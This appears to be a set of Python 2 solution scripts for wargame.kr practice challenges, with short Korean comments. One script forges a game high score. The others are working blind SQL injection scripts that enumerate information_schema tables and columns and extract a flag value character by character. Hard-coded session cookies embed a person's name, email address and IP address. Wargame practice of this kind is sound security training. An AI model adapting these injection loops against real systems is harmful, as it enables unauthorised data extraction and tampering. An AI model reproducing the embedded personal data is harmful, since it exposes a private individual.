SSo

# -*- coding: utf-8 -*-
import urllib, urllib2, sys

url = "http://wargame.kr:8080/fly_me_to_the_moon/"
score_url = "http://wargame.kr:8080/fly_me_to_the_moon/high-scores.php"
token_url = "http://wargame.kr:8080/fly_me_to_the_moon/token.php"
user_agent= "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729"
PHPSESSID = "jfovvtct42sj2atn25n902fmi7"

req = urllib2.Request(token_url)
req.add_header("User-agent", user_agent)
req.add_header('Cookie', "PHPSESSID="+PHPSESSID+";"
               +"ci_session="+"a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22a7095fb884baece73aeac4455d091c1e%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F56.0.2924.87+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487849256%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%228400%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1487848366%3B%7D07e7b2991c534171d406dbbeeb95548fd72b86b8")
res = urllib2.urlopen(req).read()
dat = {'score': "31337", 'token': res}
dat = urllib.urlencode(dat)
req = urllib2.Request(score_url,dat)
req.add_header("User-agent", user_agent)
req.add_header('Cookie', "PHPSESSID="+PHPSESSID+";"
               +"ci_session="+"a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22a7095fb884baece73aeac4455d091c1e%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F56.0.2924.87+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487849256%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%228400%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1487848366%3B%7D07e7b2991c534171d406dbbeeb95548fd72b86b8")

res = urllib2.urlopen(req).read()
print res

post로 넘어가는 값에서 인젝션이 먹힌다.

일단 소스 

# -*- coding: utf-8 -*-
#테이블 수
import urllib, urllib2,sys

url = "http://wargame.kr:8080/ip_log_table/chk.php"
user_agent= "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729"
PHPSESSID = "iobpqpqjlpam4boq5fv0vidpl0"

for i in range(50):
    dat = {'idx': "17038 and if((select count(table_name) from information_schema.tables)="+str(i)+",17038,0)"}
    dat = urllib.urlencode(dat)
    req = urllib2.Request(url,dat)
    req.add_header("User-agent", user_agent)
    req.add_header('Cookie', "PHPSESSID="+PHPSESSID+"; "
                + "ci_session="+"a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22a7095fb884baece73aeac4455d091c1e%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F56.0.2924.87+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487849256%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%228400%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1487848366%3B%7D07e7b2991c534171d406dbbeeb95548fd72b86b8")
    res = urllib2.urlopen(req).read()

    if "2017-02-23 19:47:27" in res:
        print "[*]Find tables count! : " + str(i)
        break
        sys.exit(1)

# -*- coding: utf-8 -*-
#테이블명
import urllib, urllib2,sys

url = "http://wargame.kr:8080/ip_log_table/chk.php"
user_agent= "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729"
PHPSESSID = "iobpqpqjlpam4boq5fv0vidpl0"

n = 40
while n < 43:
    flag = ""
    for i in range(40):
        for j in range(36,90):
            dat = {'idx': "17038 and if(substring((select table_name from information_schema.tables limit "+str(n)+",1),"+str(i)+",1)="+"0x"+hex(j)[2:]+",17038,0)"}
            dat = urllib.urlencode(dat)
            req = urllib2.Request(url,dat)
            req.add_header("User-agent", user_agent)
            req.add_header('Cookie', "PHPSESSID="+PHPSESSID+"; "
                        + "ci_session="+"a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22a7095fb884baece73aeac4455d091c1e%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F56.0.2924.87+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487849256%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%228400%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1487848366%3B%7D07e7b2991c534171d406dbbeeb95548fd72b86b8")
            res = urllib2.urlopen(req).read()

            if "2017-02-23 19:47:27" in res:
                flag += chr(j)
                print "[+]Find! : " + chr(j)
                break
                sys.exit(1)
    print "[*]Find flag! : " + flag
    n += 1

#칼럼명
import urllib, urllib2

url = "http://wargame.kr:8080/ip_log_table/chk.php"
user_agent= "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729"
PHPSESSID = "iobpqpqjlpam4boq5fv0vidpl0"

dat = {'idx': "17053  and if((select count(column_name) from information_schema.columns)=486,17053,0)"}
dat = urllib.urlencode(dat)
req = urllib2.Request(url,dat)
req.add_header("User-agent", user_agent)
req.add_header('Cookie', "PHPSESSID="+PHPSESSID+"; "
                + "ci_session="+"a%3A10%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%229c4639bdd4c2b4e5fdd6c246f1e79011%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F56.0.2924.87+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487934026%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%228400%22%3B%7Dba943cf039368323def355883b41fbefa82da0c6")
res = urllib2.urlopen(req).read()
print res

#테이블 injection
# -*-coding:utf8 -*-

import urllib2

print "[*] start!"
n = 0
while n < 43:
    dat = ""
    for i in range(45):
        for j in range(48,97):
            param = "1%20and%20substring((select%20table_name%20from%20information_schema.tables%20limit%20"+str(n)+",1),"+str(i)+",1)=0x"+hex(j)[2:]
            url = "http://wargame.kr:8080/SimpleBoard/read.php?idx="+param
            req = urllib2.Request(url, headers={'Host': 'wargame.kr:8080',
                                            'Cookie': 'ci_session=a%3A10%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%225b072841ee99129eeeabec29e6d6df40%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F55.0.2883.75+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487497579%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%226750%22%3B%7Ded248a2ed859a72f3df787f4750c0184da001470'})
            res = urllib2.urlopen(req).read()
            if "G00d m0rn1ng~" in res:
                dat += chr(j)
                break
    print "[*]Find table " + dat
    n += 1
print "[*] Finish!"

#플래그 구하기
# 조금 수정 필요, 답 나옴
# -*-coding:utf8 -*-
import urllib2
print "[*] start!"
n = 0
while n < 43:
    dat = ""
    for i in range(45):
        for j in range(48,97):
            param = "1%20and%20substring((select%20FLAG%20from%20README%20limit%20"+str(n)+",1),"+str(i)+",1)=0x"+hex(j)[2:]
            url = "http://wargame.kr:8080/SimpleBoard/read.php?idx="+param
            req = urllib2.Request(url, headers={'Host': 'wargame.kr:8080',
                                            'Cookie': 'ci_session=a%3A10%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%225b072841ee99129eeeabec29e6d6df40%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F55.0.2883.75+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487497579%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%226750%22%3B%7Ded248a2ed859a72f3df787f4750c0184da001470'})
            res = urllib2.urlopen(req).read()
            if "G00d m0rn1ng~" in res:
                dat += chr(j)
                break
    print "[*]Find KEY " + dat
    n += 1
print "[*] Finish!"